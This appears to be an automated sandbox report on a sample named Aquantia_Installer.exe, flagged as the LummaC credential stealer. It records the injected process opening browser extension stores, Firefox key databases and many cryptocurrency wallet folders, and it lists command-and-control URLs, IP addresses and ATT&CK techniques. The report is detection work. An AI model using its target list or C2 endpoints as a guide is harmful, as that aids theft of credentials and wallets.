              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2136115217.000000000313E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2136092641.0000000003136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2380, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2380, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Masquerading
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Screen Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              13
              Virtualization/Sandbox Evasion
              LSASS Memory151
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager13
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares31
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection
              NTDS1
              Process Discovery
              Distributed Component Object Model2
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information
              Cached Domain Credentials33
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Aquantia_Installer.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://frogs-severz.sbs/C0%Avira URL Cloudsafe
              https://frogs-severz.sbs/0%Avira URL Cloudsafe
              https://frogs-severz.sbs/apixVebc0%Avira URL Cloudsafe
              https://frogs-severz.sbs/apii0%Avira URL Cloudsafe
              fumblingactor.cyou0%Avira URL Cloudsafe
              https://frogs-severz.sbs/api0%Avira URL Cloudsafe
              https://frogs-severz.sbs:443/apiAA3GM0RssN1u2sTrQHh4TeOMDePHoCR3hPAm7IHnVLLUAAAAAADoAAAAACAAAgAAAAVG0%Avira URL Cloudsafe
              https://frogs-severz.sbs/api#O0%Avira URL Cloudsafe
              https://frogs-severz.sbs/g0%Avira URL Cloudsafe
              https://frogs-severz.sbs/api#L0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              frogs-severz.sbs
              172.67.155.47
              truefalse
                high
                fumblingactor.cyou
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://frogs-severz.sbs/apitrue
                  • Avira URL Cloud: safe
                  unknown
                  fumblingactor.cyoutrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://frogs-severz.sbs/Caspnet_regiis.exe, 00000003.00000003.2133641948.0000000003124000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://frogs-severz.sbs/apixVebcaspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://upx.sf.netAmcache.hve.6.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaaspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://frogs-severz.sbs/gaspnet_regiis.exe, 00000003.00000002.2230294668.0000000003153000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgaspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://frogs-severz.sbs/aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://frogs-severz.sbs/apiiaspnet_regiis.exe, 00000003.00000003.2162393319.000000000314B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://frogs-severz.sbs/api#Laspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://frogs-severz.sbs/api#Oaspnet_regiis.exe, 00000003.00000003.2161739316.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2175471255.0000000003158000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2162369698.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2230318456.000000000315E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157876608.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222676551.000000000315C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refaspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://frogs-severz.sbs:443/apiAA3GM0RssN1u2sTrQHh4TeOMDePHoCR3hPAm7IHnVLLUAAAAAADoAAAAACAAAgAAAAVGaspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  172.67.155.47
                                                                  frogs-severz.sbsUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1561499
                                                                  Start date and time:2024-11-23 15:21:05 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 58s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:10
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Aquantia_Installer.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/7@2/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 98%
                                                                  • Number of executed functions: 29
                                                                  • Number of non-executed functions: 58
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: Aquantia_Installer.exe
                                                                  TimeTypeDescription
                                                                  09:21:53API Interceptor9x Sleep call for process: aspnet_regiis.exe modified
                                                                  09:22:26API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  172.67.155.47arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                    xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      frogs-severz.sbsarcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      b.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 193.143.1.19
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSCall 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.33.116
                                                                      Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.33.116
                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.33.116
                                                                      arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                      • 104.26.13.205
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.70.128
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.162.84
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):0.9942277266542097
                                                                      Encrypted:false
                                                                      SSDEEP:192:UI5GTNyokkd0BU/qaGtizuiFlZ24IO8a:ITN1teBU/qaRzuiFlY4IO8a
                                                                      MD5:FA6935AEC8C341EF5E5C4A95F24411B2
                                                                      SHA1:194F424CF73089E519029A4583E860A7D6EAD359
                                                                      SHA-256:CDE7FC63B1325ACF76A7D36484BC8BC8D845EF6EEFBF446683D95DFAA10401AF
                                                                      SHA-512:BE8A12F5F0C2AECBA0F4892F6ADAA51D1F6761EE4F06EF4BA86E882A46802EBC655501F855487261A28D13FF11141DBE3DF37E529C2BCA918F4AF47BB7E2FDC5
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.5.3.1.4.1.5.5.2.1.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.5.3.1.5.7.3.3.3.3.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.6.9.c.0.0.f.-.6.e.9.5.-.4.6.d.2.-.8.5.4.1.-.8.9.2.e.6.2.f.6.b.f.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.4.2.a.e.f.e.-.6.4.6.9.-.4.5.a.e.-.9.a.e.2.-.7.9.0.3.b.0.1.5.8.e.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.q.u.a.n.t.i.a._.I.n.s.t.a.l.l.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.e.n.j.a.m.i.n.F.e.l.i.x.L.i.a.m...d.Y.Z.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.4.-.0.0.0.1.-.0.0.1.4.-.0.2.0.d.-.e.d.0.a.b.3.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.3.a.2.c.2.e.5.2.8.1.8.0.3.e.1.6.b.7.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 14:21:54 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):194476
                                                                      Entropy (8bit):3.4287678272711135
                                                                      Encrypted:false
                                                                      SSDEEP:1536:5b2crpN4uE2aOiLIsLTgRI4CRN4DJJsCDAh/I3p:5a44uEqiLIsLTgRMv4DLAhA3
                                                                      MD5:9681EAAEBF315C0BA5D33FB4CD752A4A
                                                                      SHA1:868443E7C6C3C133E5823DC80D35C62F4C2BD625
                                                                      SHA-256:EA07D8BA7932A3DD7DA9CB5B891817D09E4F0906F8C4EE3D89EFD26524EACBEA
                                                                      SHA-512:9B03184C0BCC376925E61D1531CD456CC8220D88D7F495065DCB68EAC44158E2DEE8FDAA8ADDD322208544C98E39910FE7F09F47DFBD63E17BCE6F41F36CEB53
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:MDMP..a..... .........Ag............D...............X.......$................J..........`.......8...........T...........00..|...........,............ ..............................................................................eJ....... ......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8454
                                                                      Entropy (8bit):3.7065098465604778
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJ116Hzn+6YEIwSU9JTtjgmfZoY+prB89bY0sfDom:R6lXJn6HL+6YEfSU9JTtjgmfSYVYnf5
                                                                      MD5:5B13C4ADE9BB4FC4370F6049A30803F5
                                                                      SHA1:53DF1D133FBC23C4DDA8EA349DD4F35E7EE623B7
                                                                      SHA-256:0619CB53B55133627BBE0E29D78418E16CF8E1CCF81CA056C53F2A7CD720ACAD
                                                                      SHA-512:C3FCE1FDB0AE27427811120407D2E86CB4DB3274DCDA48968B3ACBD01F2A5EBDDEBE421296EB5BE9555698E914DF78FF0495FEF7C92FBD2F61907994CA36FCB5
                                                                      Malicious:false
                                                                      Reputation:low
